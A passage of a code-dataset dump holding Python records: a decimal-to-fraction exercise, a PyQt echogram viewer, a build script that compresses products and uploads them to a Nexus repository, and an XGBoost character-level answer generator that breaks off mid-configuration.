\"\"\" 无线循环小数也是有理数,有理数都可以表示成两个整数相除的形式 \"\"\"\n num = pow(10, len(decimal))\n a = Euclidean(int(decimal), (num-1))\n x = \"{0:d}/{1:d}\".format(int(decimal)//a, (num-1)//a)\n return x\n\nif __name__ == \"__main__\":\n integer, decimal = input(\"输入一个循环小数(整数部分为0且只显示它的第一个循环节):\")\\\n .split(\".\")\n if int(integer) != 0:\n raise Exception(\"整数部分应为0!\")\n else:\n print(Decimal_to_Fraction(decimal))\n\n","sub_path":"20_01_31 Exercises/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"26251196","text":"\nimport os\nimport functools\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom .ui import ui_echogram_viewer\n\nclass echogram_viewer(QtWidgets.QMainWindow, ui_echogram_viewer.Ui_echogram_viewer):\n\n def __init__(self, p_data, plot_attribute='Sv', parent=None):\n super(echogram_viewer, self).__init__(parent)\n self.setupUi(self)\n\n self.echogramLabel = None\n\n # connect the echogram signals\n self.QEchogramViewer.mousePress.connect(self.echogramClick)\n self.QEchogramViewer.mouseMove.connect(self.echogramMouseInWidget)\n self.QEchogramViewer.mouseRelease.connect(self.echogramUnClick)\n\n # restore the application state\n self.appSettings = QtCore.QSettings('afsc.noaa.gov', 'echogram_viewer')\n size = self.appSettings.value('winsize', QtCore.QSize(1000,600))\n position = self.appSettings.value('winposition', QtCore.QPoint(5,5))\n\n # et the virtual screen size\n screen = QtWidgets.QApplication.primaryScreen()\n v_screen_size = screen.availableVirtualSize()\n\n # check if our last window size is too big for our current screen\n if (size.width() > v_screen_size.width()):\n size.setWidth(v_screen_size.width() - 50)\n if (size.height() > v_screen_size.height()):\n size.setHeight(v_screen_size.height() - 50)\n\n # now check if our last position is at least on our current desktop\n # if it is off the screen we just throw it up at 0\n if (position.x() > size.width() - 50):\n position.setX(0)\n if (position.y() > size.height() - 50):\n position.setY(0)\n\n # now move and resize the window\n self.move(position)\n self.resize(size)\n\n # set the base directory path - this is the full path to this application\n self.baseDir = functools.reduce(lambda l,r: l + os.path.sep + r,\n os.path.dirname(os.path.realpath(__file__)).split(os.path.sep))\n try:\n self.setWindowIcon(QtWidgets.QIcon(self.baseDir + os.sep + 'resources/echoIcon.png'))\n except:\n pass\n\n self.update_echogram(p_data, plot_attribute)\n\n\n @pyqtSlot(object, object, int, object, list)\n def echogramClick(self, imageObj, clickLoc, button, modifier, items):\n pass\n# if (items):\n# print(\"Picked:\",items)\n\n\n @pyqtSlot(object, object, int, object, list)\n def echogramUnClick(self, imageObj, clickLoc, button, modifier, items):\n pass\n\n\n @pyqtSlot(object, object, object, list, list)\n def echogramMouseInWidget(self, imageObj, location, modifier, draggedItems, items):\n\n# if (items):\n# print(\"Dragged:\", items)\n\n if (location[0] != None):\n # update the depth/time at cursor label\n locationString = 'Depth: %.2fm Time: %s ' % (location[1],\n location[0].tolist().strftime('%m/%d/%Y %H:%M:%S'))\n self.echogramLabel.setText(locationString)\n\n # force a redraw of the echogram so the label is refreshed\n self.QEchogramViewer.viewport().update()\n\n\n def update_echogram(self, p_data, plot_attribute='Sv'):\n \"\"\"\n update_echogram updates the echogram image using data from the provided\n processed_data object\n \"\"\"\n\n # clear out the echogram viewer\n self.QEchogramViewer.clearViewer()\n\n if hasattr(p_data, 'range'):\n y_axis = p_data.range\n else:\n y_axis = p_data.depth\n\n # set the Echogram data\n self.QEchogramViewer.setEchogramFromArray(p_data.data, yaxis=y_axis,\n xaxis=p_data.ping_time)\n\n # add the echogram HUD text\n self.echogramLabel = self.QEchogramViewer.addHudText(QtCore.QPointF(0.99,0.995),\n '', color=[0,250,0], alpha=200, halign='right', valign='bottom')\n self.echogramLabel.setBackground([0,0,0], 250)\n\n # fill the echogram window - vertical extent only\n self.QEchogramViewer.fillExtent(verticalOnly=True)\n\n\n\n def add_line(self, line, **kwargs):\n\n self.QEchogramViewer.addLine([line.ping_time, line.data], **kwargs)\n\n def closeEvent(self, event):\n\n # store the application size and position\n self.appSettings.setValue('winposition', self.pos())\n self.appSettings.setValue('winsize', self.size())\n\n event.accept()\n\n\n\n","sub_path":"echolab2/plotting/qt/echogram_viewer.pyw","file_name":"echogram_viewer.pyw","file_ext":"pyw","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371269689","text":"#!/usr/bin/env python\n\nimport optparse\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\n\ndef ParseCommandLine():\n parser = optparse.OptionParser(usage = \"Usage: %prog [options] repo builddir\")\n parser.add_option(\"-c\", \"--compress\", dest=\"compress\", action=\"store_true\", default=False, help=\"compress output files\")\n parser.add_option(\"-n\", \"--nexus\", dest=\"nexus\", action=\"store_true\", default=False, help=\"update output files to Eclipse Nexus\")\n parser.add_option(\"-s\", \"--snapshot\", dest=\"snapshot\", action=\"store_true\", default=False, help=\"update output files to Eclipse Nexus\")\n parser.add_option(\"-r\", \"--release\", dest=\"release\", action=\"store_true\", default=False, help=\"update output files to Eclipse Nexus\")\n parser.add_option(\"-a\", \"--application\", dest=\"application\", action=\"store_true\", default=False, help=\"package as application\")\n (options, args) = parser.parse_args()\n\n if len(args) != 2:\n parser.error(\"wrong number of positional arguments\")\n\n return options, args[0], args[1]\n\ndef SanitisePath(path):\n return os.path.realpath(path)\n\ndef GetSlug(repo, path, application):\n def CaptureOutput(arguments):\n try:\n proc = subprocess.Popen(arguments, stdout=subprocess.PIPE)\n (stdout, stderr) = proc.communicate()\n except:\n return None\n if proc.returncode != 0:\n return None\n else:\n return re.search(\"^(?P(.|\\\\n)*.)?\\\\n*$\", stdout).group(\"content\")\n\n versionTool = os.path.join(path, \"versionTool\", \"versionTool\")\n if application:\n repoVersion = CaptureOutput([versionTool, \"--version\", repo, \"--no-libmarket\"])\n else:\n repoVersion = CaptureOutput([versionTool, \"--version\", repo])\n eclipsePlatform = CaptureOutput([versionTool, \"--eclipse-platform\"])\n buildType = CaptureOutput([versionTool, \"--build-type\"])\n\n if (repoVersion is None) or (eclipsePlatform is None) or (buildType is None):\n return None\n else:\n return (\"%s-%s\" % (eclipsePlatform, buildType.lower()), repoVersion)\n\ndef GetTargets(path, slug):\n def GetPathTargets(path, slug):\n pattern = re.compile(\"^(?P.+)(?P-\" + re.escape(slug[0]) + \"(\\\\..+)?)$\")\n # TODO: determine the path in a more generic way\n for line in open(os.path.join(path, \"..\", \"install_manifest.txt\")):\n line = line.rstrip(\"\\n\")\n (head, tail) = os.path.split(line);\n match = pattern.match(tail)\n if (match is not None):\n yield line, os.path.join(head, \"%s-%s%s\" % (match.group(\"base\"), slug[1], match.group(\"suffix\")))\n else:\n yield line, None\n\n try:\n return None if slug is None else tuple(GetPathTargets(path, slug))\n except:\n return None\n\ndef RenameTargets(targets, compress):\n def CompressFile(path):\n # TODO: support non-UNIX\n try:\n sys.stderr.write(\"Compressing %s with bzip2\\n\" % path)\n result = subprocess.call([\"bzip2\", \"-fk\", path])\n return path + \".bz2\" if result == 0 else None\n except:\n return None\n\n def RenameOneGroup(old, new):\n failed = False\n output = list()\n if new is not None:\n try:\n os.rename(old, new)\n except:\n sys.stderr.write(\"Failed to rename %s to %s\\n\" % (old, new))\n return None\n else:\n sys.stdout.write(\"Renamed %s to %s\\n\" % (old, new))\n else:\n new = old\n compressed = CompressFile(new)\n if compressed is None:\n sys.stderr.write(\"Failed to compress %s\\n\" % new)\n return None\n else:\n sys.stdout.write(\"Compressed %s as %s\\n\" % (new, compressed))\n return new\n\n for target in targets:\n yield None if target is None or len(target) != 2 else RenameOneGroup(target[0], target[1])\n\ndef NexusUpload(dir, repo, path, slug, output, application):\n zipName = \"\"\n if not application:\n zipName = \"lib\"\n zipName += \"%s-%s-%s.zip\" % (repo, slug[1], slug[0])\n zipPath = os.path.join(path, zipName)\n try:\n if os.path.lexists(zipPath):\n os.remove(zipPath)\n args = [\"zip\", \"-j9\", zipName]\n args.extend([os.path.relpath(product, os.path.realpath(path)) for product in output])\n sys.stdout.write(\" \".join(args) + \"\\n\")\n status = subprocess.call(args, cwd=path)\n except:\n status = 255\n if status != 0:\n sys.stderr.write(\"Failed to zip products for %s\\n\" % path)\n return False\n try:\n # See http://jira/browse/OP-1967\n artifactId = \"-DartifactId=lib%s\"\n groupId = \"-DgroupId=Library\"\n if application:\n artifactId = \"-DartifactId=%s\"\n groupId = \"-DgroupId=C\"\n args = [\n \"/opt/apache-maven-2.2.1/bin/mvn\", \"-e\", \"deploy:deploy-file\",\n \"-Durl=http://nexus/content/repositories/\" + dir,\n \"-DrepositoryId=nexus\",\n groupId,\n artifactId % repo,\n (\"-Dversion=%s\" % slug[1]) + (\"-SNAPSHOT\" if dir == \"snapshot\" else \"\"),\n \"-Dpackaging=zip\",\n \"-Dclassifier=%s\" % slug[0],\n \"-DuniqueVersion=false\",\n \"-Dfile=%s\" % zipPath]\n sys.stdout.write(\" \".join(args) + \"\\n\")\n environ = os.environ.copy()\n environ['M2_HOME'] = '/opt/apache-maven-2.2.1'\n status = subprocess.call(args, env=environ)\n\n except:\n status = 255\n if status != 0:\n sys.stderr.write(\"Failed to upload %s to Eclipse Nexus\\n\" % zipPath)\n return False\n return True\n\nfailed = False\noptions, repo, path = ParseCommandLine()\npath = SanitisePath(path)\nslug = GetSlug(repo, path, options.application)\ntargets = GetTargets(path, slug)\n\noutputs = tuple(RenameTargets(targets, options.compress))\nif None in outputs:\n failed = True\n\nif options.nexus:\n if options.snapshot == options.release:\n sys.stderr.write(\"One and only one of snapshot / release must be specified but not both\")\n failed = True\n elif (path is not None) and (slug is not None) and (None not in outputs):\n dir = (\"snapshot\" if options.snapshot else \"release\")\n if not NexusUpload(dir, repo, path, slug, outputs, options.application):\n sys.stderr.write(\"Eclipse Nexus upload failed for %s\\n\" % path)\n failed = True\n\nif failed:\n sys.exit(2)\n","sub_path":"cpp/cmake_practice/advance/build/tools/renameInstalledProducts.py","file_name":"renameInstalledProducts.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"561016962","text":"# -*- coding: utf-8 -*-\r\n'''\r\nТренировка авторегрессионной модели, которая посимвольно в режиме teacher forcing учится\r\nгенерировать ответ для заданной предпосылки и вопроса.\r\n\r\nВ качестве классификационного движка для выбора символов используется XGBoost.\r\n\r\nЗа один запуск модели выбирается один новый символ, который добавляется к ранее сгенерированной\r\nцепочке символов ответа (см. функцию generate_answer).\r\n'''\r\n\r\nfrom __future__ import division # for python2 compatibility\r\nfrom __future__ import print_function\r\n\r\nimport itertools\r\nimport json\r\nimport os\r\nimport sys\r\nimport argparse\r\nimport codecs\r\nimport gzip\r\nfrom collections import Counter\r\nimport six\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sklearn.metrics\r\nimport tqdm\r\nimport xgboost\r\nfrom scipy.sparse import lil_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.random_projection import SparseRandomProjection\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport rusyllab\r\n\r\nfrom utils.tokenizer import Tokenizer\r\nimport utils.console_helpers\r\nimport utils.logging_helpers\r\n\r\n# основной настроечный метапараметр - длина символьных шинглов для представления\r\n# предпосылки и вопроса (bag of shingles).\r\nSHINGLE_LEN = 3\r\n\r\nNB_PREV_CHARS = 5 # кол-во пред. символов в сгенерированном ответе, учитываемых при выборе следующего символа.\r\n\r\nNB_SAMPLES = 1000000 # кол-во записей в датасете (до разбивки на тренировку и валидацию)\r\n\r\n# Шинглы с частотой меньше указанной не будут давать входные фичи.\r\nMIN_SHINGLE_FREQ = 2\r\n\r\nBEG_LEN = 10 # длина в символах начального фрагмента фраз, который дает отдельные фичи\r\nEND_LEN = 10 # длина в символах конечного фрагмента фраз, который дает отдельные фичи\r\n\r\nNB_TREES = 1000\r\nMAX_DEPTH = 6 #8 # макс. глубина для градиентного бустинга\r\n\r\n\r\n# -------------------------------------------------------------------\r\n\r\nBEG_WORD = u'\\b'\r\nEND_WORD = u'\\n'\r\n\r\nBEG_CHAR = u'\\b'\r\nEND_CHAR = u'\\n'\r\n\r\n# -------------------------------------------------------------------\r\n\r\n\r\nclass Sample:\r\n def __init__(self, premises, question, answer):\r\n self.premises = premises[:]\r\n self.question = question\r\n self.answer = answer\r\n\r\n\r\ndef word2pieces(word):\r\n return word # вариант для разбивки на символы\r\n #return rusyllab.split_word(word) # вариант для разбивки на слоги\r\n\r\n\r\ndef ngrams(s, n):\r\n return [u''.join(z) for z in itertools.izip(*[s[i:] for i in range(n)])]\r\n\r\n\r\ndef words2str(words):\r\n \"\"\"\r\n Цепочку слов соединяем в строку, добавляя перед цепочкой и после нее\r\n пробел и специальные символы начала и конца.\r\n :param words:\r\n :return:\r\n \"\"\"\r\n return BEG_WORD + u' ' + u' '.join(words) + u' ' + END_WORD\r\n\r\n\r\ndef undress(s):\r\n return s.replace(BEG_CHAR, u' ').replace(END_CHAR, u' ').strip()\r\n\r\n\r\ndef encode_char(c):\r\n if c == BEG_CHAR:\r\n return u'\\\\b'\r\n elif c == END_CHAR:\r\n return u'\\\\r'\r\n else:\r\n return c\r\n\r\n\r\ndef vectorize_sample_x(X_data, idata, premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_str, premise_words,\r\n question_str, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id):\r\n ps = set(premise_shingles)\r\n qs = set(question_shingles)\r\n\r\n common_shingles = ps & qs\r\n notmatched_ps = ps - qs\r\n notmatched_qs = qs - ps\r\n\r\n nb_inshingles = len(inshingle2id)\r\n\r\n icol = 0\r\n\r\n sx = [common_shingles, notmatched_ps, notmatched_qs,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles]\r\n\r\n for shingles in sx:\r\n for shingle in shingles:\r\n if shingle in inshingle2id:\r\n X_data[idata, icol + inshingle2id[shingle]] = True\r\n icol += nb_inshingles\r\n\r\n nb_outshingles = len(outshingle2id)\r\n for shingle in answer_shingles:\r\n if shingle in outshingle2id:\r\n X_data[idata, icol + outshingle2id[shingle]] = True\r\n icol += nb_outshingles\r\n\r\n for c in answer_prev_chars:\r\n X_data[idata, icol+outchar2id[c]] = True\r\n icol += NB_PREV_CHARS*len(outchar2id)\r\n\r\n X_data[idata, icol] = word_index\r\n icol += 1\r\n\r\n X_data[idata, icol] = char_index\r\n icol += 1\r\n\r\n # помечаем символы, которые могут быть после последнего символа в сгенерированной\r\n # части ответа с точки зрения строки предпосылки, вопроса и т.д.\r\n prev_char1 = answer_prev_chars[::-1][-1]\r\n\r\n premise_str1 = premise_str.replace(BEG_CHAR + u' ', BEG_CHAR)\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in premise_str1:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n question_str1 = question_str.replace(BEG_CHAR + u' ', BEG_CHAR)\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in question_str1:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n premise_words_2grams = set()\r\n for premise_word in premise_words:\r\n for wordform in lexicon.get_forms(premise_word):\r\n premise_words_2grams.update(ngrams(u' ' + wordform + u' ', 2))\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in premise_words_2grams:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n question_words_2grams = set()\r\n for question_word in question_words:\r\n for wordform in lexicon.get_forms(question_word):\r\n question_words_2grams.update(ngrams(u' ' + wordform + u' ', 2))\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in question_words_2grams:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n\r\n\r\ndef generate_answer(xgb_answer_generator, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n shingle_len, nb_prev_chars, nb_features, id2outchar, phrase2sdr,\r\n premise, question):\r\n premise_words = tokenizer.tokenize(premise)\r\n question_words = tokenizer.tokenize(question)\r\n\r\n premise_wx = words2str(premise_words)\r\n question_wx = words2str(question_words)\r\n\r\n premise_shingles = ngrams(premise_wx, shingle_len)\r\n question_shingles = ngrams(question_wx, shingle_len)\r\n\r\n premise_beg_shingles = ngrams(premise_wx[:BEG_LEN], SHINGLE_LEN)\r\n question_beg_shingles = ngrams(question_wx[:BEG_LEN], SHINGLE_LEN)\r\n\r\n premise_end_shingles = ngrams(premise_wx[-END_LEN:], SHINGLE_LEN)\r\n question_end_shingles = ngrams(question_wx[-END_LEN:], SHINGLE_LEN)\r\n\r\n if phrase2sdr is not None:\r\n premise_sdr = phrase2sdr[premise_wx]\r\n question_sdr = phrase2sdr[question_wx]\r\n else:\r\n premise_sdr = None\r\n question_sdr = None\r\n\r\n answer_chain = BEG_CHAR\r\n\r\n while True:\r\n # цикл добавления новых сгенерированных символов\r\n answer_len = len(answer_chain)\r\n answer_shingles = ngrams(answer_chain, shingle_len)\r\n answer_prev_chars = answer_chain[max(0, answer_len - nb_prev_chars):answer_len]\r\n answer_prev_chars = answer_prev_chars[::-1]\r\n\r\n left_chars = answer_chain[1:]\r\n\r\n # номер генерируемого слова получаем как число пробелов слева\r\n word_index = left_chars.count(u' ')\r\n\r\n # номер генерируемого символа в генерируемом слове - отсчитываем от последнего пробела\r\n rpos = left_chars.rfind(u' ')\r\n if rpos == -1:\r\n # это первое слово\r\n char_index = len(left_chars)\r\n else:\r\n char_index = len(left_chars) - rpos - 1\r\n\r\n X_data = lil_matrix((1, nb_features), dtype='float')\r\n vectorize_sample_x(X_data, 0, premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_wx, premise_words,\r\n question_wx, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id)\r\n\r\n D_data = xgboost.DMatrix(X_data, silent=True)\r\n y = xgb_answer_generator.predict(D_data)\r\n c = id2outchar[y[0]]\r\n answer_chain += c\r\n if c == END_CHAR or answer_len >= 100:\r\n break\r\n\r\n return u'{}'.format(answer_chain[1:-1]).strip()\r\n\r\n\r\nclass Word2Lemmas(object):\r\n def __init__(self):\r\n pass\r\n\r\n def load(self, path):\r\n print('Loading lexicon from {}'.format(path))\r\n self.lemmas = dict()\r\n self.forms = dict()\r\n with gzip.open(path, 'r') as rdr:\r\n for line in rdr:\r\n tx = line.strip().decode('utf8').split('\\t')\r\n if len(tx) == 2:\r\n form = tx[0]\r\n lemma = tx[1]\r\n\r\n if form not in self.forms:\r\n self.forms[form] = [lemma]\r\n else:\r\n self.forms[form].append(lemma)\r\n\r\n if lemma not in self.lemmas:\r\n self.lemmas[lemma] = {form}\r\n else:\r\n self.lemmas[lemma].add(form)\r\n print('Lexicon loaded: {} lemmas, {} wordforms'.format(len(self.lemmas), len(self.forms)))\r\n\r\n def get_forms(self, word):\r\n if word in self.forms:\r\n #result = set()\r\n #for lemma in self.forms[word]:\r\n # result.update(self.lemmas[lemma])\r\n #return result\r\n return set(itertools.chain(*(self.lemmas[lemma] for lemma in self.forms[word])))\r\n else:\r\n return [word]\r\n\r\n\r\n# -------------------------------------------------------------------\r\n\r\nparser = argparse.ArgumentParser(description='Answer text generator')\r\nparser.add_argument('--run_mode', type=str, default='train', help='what to do: train | query')\r\nparser.add_argument('--input', type=str, default='../data/pqa_all.dat', help='training dataset path')\r\nparser.add_argument('--tmp', type=str, default='../tmp', help='folder to store results')\r\nparser.add_argument('--data_dir', type=str, default='../data', help='folder containing some evaluation datasets')\r\nparser.add_argument('--word2lemmas', type=str, default='../data/ru_word2lemma.tsv.gz')\r\n\r\n\r\nargs = parser.parse_args()\r\n\r\nrun_mode = args.run_mode\r\ntmp_folder = args.tmp\r\ndata_folder = args.data_dir\r\n\r\n# Этот датасет создается скриптом prepare_qa_dataset.py\r\ninput_path = args.input\r\n\r\n# Отбор и упаковка пар словоформа-лемма выполняется скриптом prepare_word2lemmas.py\r\nword2lemmas_path = args.word2lemmas\r\n\r\ntokenizer = Tokenizer()\r\n\r\nlexicon = Word2Lemmas()\r\nlexicon.load(word2lemmas_path)\r\n#for w in lexicon.get_forms(u'дяди'):\r\n# print(u'{}'.format(w))\r\n\r\nconfig_path = os.path.join(tmp_folder,'xgb_answer_generator.config')\r\n\r\nif run_mode == 'train':\r\n input_shingles = set()\r\n output_shingles = set()\r\n inshingle2freq = Counter()\r\n outshingle2freq = Counter()\r\n\r\n phrases1 = []\r\n\r\n # Загружаем датасет, содержащий сэмплы ПРЕДПОСЫЛКИ-ВОПРОС-ОТВЕТ\r\n print(u'Loading samples from {}'.format(input_path))\r\n samples0 = []\r\n max_nb_premises = 0 # макс. число предпосылок в сэмплах\r\n tokenizer = Tokenizer()\r\n tokenizer.load()\r\n\r\n with codecs.open(input_path, 'r', 'utf-8') as rdr:\r\n lines = []\r\n for line in rdr:\r\n line = line.strip()\r\n if len(line) == 0:\r\n if len(lines) > 0:\r\n premises = lines[:-2]\r\n question = lines[-2]\r\n answer = lines[-1]\r\n if len(premises) <= 1:\r\n sample = Sample(premises, question, answer)\r\n samples0.append(sample)\r\n\r\n max_nb_premises = max(max_nb_premises, len(premises))\r\n\r\n for phrase in itertools.chain(premises, [question]):\r\n words = tokenizer.tokenize(phrase)\r\n wx = words2str(words)\r\n phrases1.append(wx)\r\n for s in ngrams(wx, SHINGLE_LEN):\r\n input_shingles.add(s)\r\n inshingle2freq[s] += 1\r\n\r\n for s in ngrams(BEG_CHAR + answer + END_CHAR, SHINGLE_LEN):\r\n output_shingles.add(s)\r\n outshingle2freq[s] += 1\r\n\r\n lines = []\r\n\r\n else:\r\n lines.append(line)\r\n\r\n samples = samples0\r\n\r\n all_chars = set(itertools.chain(*phrases1))\r\n max_phrase_len = max(map(len, phrases1))\r\n\r\n nb_chars = len(all_chars)\r\n print('nb_chars={}'.format(nb_chars))\r\n print('max_phrase_len={}'.format(max_phrase_len))\r\n\r\n char2index = dict((c, i) for (i, c) in enumerate(filter(lambda z: z != u' ', all_chars)))\r\n\r\n # оставляем только шинглы с частотой не менее порога\r\n input_shingles = set(s for s, f in inshingle2freq.iteritems() if f >= MIN_SHINGLE_FREQ)\r\n output_shingles = set(s for s, f in outshingle2freq.iteritems() if f >= MIN_SHINGLE_FREQ)\r\n\r\n nb_inshingles = len(input_shingles)\r\n inshingle2id = dict((s, i) for i, s in enumerate(input_shingles))\r\n print('nb_inshingles={}'.format(nb_inshingles))\r\n\r\n nb_outshingles = len(output_shingles)\r\n outshingle2id = dict((s, i) for i, s in enumerate(output_shingles))\r\n print('nb_outshingles={}'.format(nb_outshingles))\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n premises = []\r\n questions = []\r\n answers = []\r\n\r\n for sample in samples:\r\n premise = sample.premises[0] if len(sample.premises) > 0 else u''\r\n question = sample.question\r\n answer = sample.answer\r\n if answer not in [u'да', u'нет']:\r\n premises.append(premise)\r\n questions.append(question)\r\n answers.append(BEG_CHAR+answer+END_CHAR)\r\n\r\n SEED = 123456\r\n TEST_SHARE = 0.2\r\n premises_train, premises_test,\\\r\n questions_train, questions_test,\\\r\n answers_train, answers_test = train_test_split(premises, questions, answers,\r\n test_size=TEST_SHARE,\r\n random_state=SEED)\r\n\r\n # оставим в разборах те, для которых все символы ответа присутствуют и в тестовом, и в\r\n # тренировочном наборах.\r\n set1 = set()\r\n for a in answers_train:\r\n set1.update(a)\r\n\r\n set2 = set()\r\n for a in answers_test:\r\n set2.update(a)\r\n\r\n missing_chars = (set1 - set2) | (set2 - set1)\r\n print(u'missing_chars={}'.format(u' '.join(missing_chars)))\r\n\r\n if len(missing_chars) > 0:\r\n print('Removing samples with cross-missing chars')\r\n premises_train0 = []\r\n questions_train0 = []\r\n answers_train0 = []\r\n for premise, question, answer in itertools.izip(premises_train, questions_train, answers_train):\r\n if not any(c in missing_chars for c in answer):\r\n premises_train0.append(premise)\r\n questions_train0.append(question)\r\n answers_train0.append(answer)\r\n\r\n premises_test0 = []\r\n questions_test0 = []\r\n answers_test0 = []\r\n for premise, question, answer in itertools.izip(premises_test, questions_test, answers_test):\r\n if not any(c in missing_chars for c in answer):\r\n premises_test0.append(premise)\r\n questions_test0.append(question)\r\n answers_test0.append(answer)\r\n\r\n premises_train = premises_train0\r\n questions_train = questions_train0\r\n answers_train = answers_train0\r\n\r\n premises_test = premises_test0\r\n questions_test = questions_test0\r\n answers_test = answers_test0\r\n\r\n nb_train = sum((len(x)+2) for x in answers_train)\r\n nb_test = sum((len(x)+2) for x in answers_test)\r\n\r\n all_outchars = set([BEG_CHAR, END_CHAR])\r\n for answer in itertools.chain(answers_train, answers_test):\r\n all_outchars.update(answer.lower())\r\n\r\n nb_outchars = len(all_outchars)\r\n outchar2id = dict((c, i) for i, c in enumerate(all_outchars))\r\n print('nb_outchars={}'.format(nb_outchars))\r\n\r\n print('nb_train={} nb_test={}'.format(nb_train, nb_test))\r\n\r\n nb_features = nb_inshingles*3 + nb_outshingles + nb_outchars*NB_PREV_CHARS\r\n nb_features += 2 # номер генерируемого слова и номер символа в генерируемом слове\r\n nb_features += nb_inshingles*2 # шинглы в начальных фрагментах предпосылки и вопроса\r\n nb_features += nb_inshingles*2 # шинглы в конечных фрагментах предпосылки и вопроса\r\n nb_features += nb_outchars # какие символы в предпосылке бывают после текущего символа\r\n nb_features += nb_outchars # какие символы бывают в любых формах слов предпосылки\r\n nb_features += nb_outchars # какие символы в вопросе бывают после текущего символа\r\n nb_features += nb_outchars # какие символы бывают в любых формах слов вопроса\r\n\r\n print('nb_features={}'.format(nb_features))\r\n\r\n X_train = lil_matrix((nb_train, nb_features), dtype='float32')\r\n y_train = []\r\n\r\n X_test = lil_matrix((nb_test, nb_features), dtype='float32')\r\n y_test = []\r\n\r\n for train_or_test in range(2):\r\n if train_or_test == 0:\r\n premises = premises_train\r\n questions = questions_train\r\n answers = answers_train\r\n X_data = X_train\r\n y_data = y_train\r\n descr = 'Vectorization of training set'\r\n else:\r\n premises = premises_test\r\n questions = questions_test\r\n answers = answers_test\r\n X_data = X_test\r\n y_data = y_test\r\n descr = 'Vectorization of test data'\r\n\r\n idata = 0\r\n\r\n for index, (premise, question, answer) in tqdm.tqdm(enumerate(itertools.izip(premises, questions, answers)),\r\n total=len(premises),\r\n desc=descr):\r\n premise_words = tokenizer.tokenize(premise)\r\n question_words = tokenizer.tokenize(question)\r\n\r\n premise_str = words2str(premise_words)\r\n question_str = words2str(question_words)\r\n\r\n premise_shingles = ngrams(premise_str, SHINGLE_LEN)\r\n question_shingles = ngrams(words2str(question_words), SHINGLE_LEN)\r\n\r\n premise_beg_shingles = ngrams(words2str(premise_words)[:BEG_LEN], SHINGLE_LEN)\r\n question_beg_shingles = ngrams(words2str(question_words)[:BEG_LEN], SHINGLE_LEN)\r\n\r\n premise_end_shingles = ngrams(words2str(premise_words)[-END_LEN:], SHINGLE_LEN)\r\n question_end_shingles = ngrams(words2str(question_words)[-END_LEN:], SHINGLE_LEN)\r\n\r\n premise_sdr = None\r\n question_sdr = None\r\n\r\n answer2 = answer\r\n for answer_len in range(1, len(answer2)):\r\n answer_chain = answer2[:answer_len] # эта цепочка уже сгенерирована к данному моменту\r\n answer_shingles = ngrams(answer_chain, SHINGLE_LEN)\r\n next_char = answer2[answer_len]\r\n answer_prev_chars = answer2[max(0, answer_len-NB_PREV_CHARS):answer_len]\r\n answer_prev_chars = answer_prev_chars[::-1] # чтобы предпоследний символ был всегда на фиксированном месте в метрице, etc\r\n\r\n left_chars = answer2[1:answer_len]\r\n\r\n # номер генерируемого слова получаем как число пробелов слева\r\n word_index = left_chars.count(u' ')\r\n\r\n # номер генерируемого символа в генерируемом слове - отсчитываем от последнего пробела\r\n rpos = left_chars.rfind(u' ')\r\n if rpos == -1:\r\n # это первое слово\r\n char_index = len(left_chars)\r\n else:\r\n char_index = len(left_chars) - rpos - 1\r\n\r\n vectorize_sample_x(X_data, idata,\r\n premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_str, premise_words,\r\n question_str, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id)\r\n y_data.append(outchar2id[next_char])\r\n\r\n idata += 1\r\n\r\n if X_train.shape[0] != len(y_train):\r\n X_train = X_train[0:len(y_train), :]\r\n\r\n if X_test.shape[0] != len(y_test):\r\n X_test = X_test[0:len(y_test), :]\r\n\r\n id2outchar = dict([(i, c) for c, i in outchar2id.items()])\r\n\r\n print('uniques(y_train)={}'.format(len(set(y_train))))\r\n print('uniques(y_test)={}'.format(len(set(y_test))))\r\n\r\n for y in set(y_train)-set(y_test):\r\n c = id2outchar[y]\r\n print(u'Missing in y_test: {}'.format(c))\r\n\r\n\r\n D_train = xgboost.DMatrix(X_train, y_train, silent=0)\r\n D_val = xgboost.DMatrix(X_test, y_test, silent=0)\r\n\r\n xgb_params = {\r\n 'booster': 'gbtree',\r\n 'subsample': 1.0,\r\n 'max_depth': MAX_DEPTH,\r\n 'seed': 123456,\r\n 'min_child_weight': 1,\r\n 'eta': 0.35,\r\n 'gamma': 0.01,\r\n 'colsample_bytree': 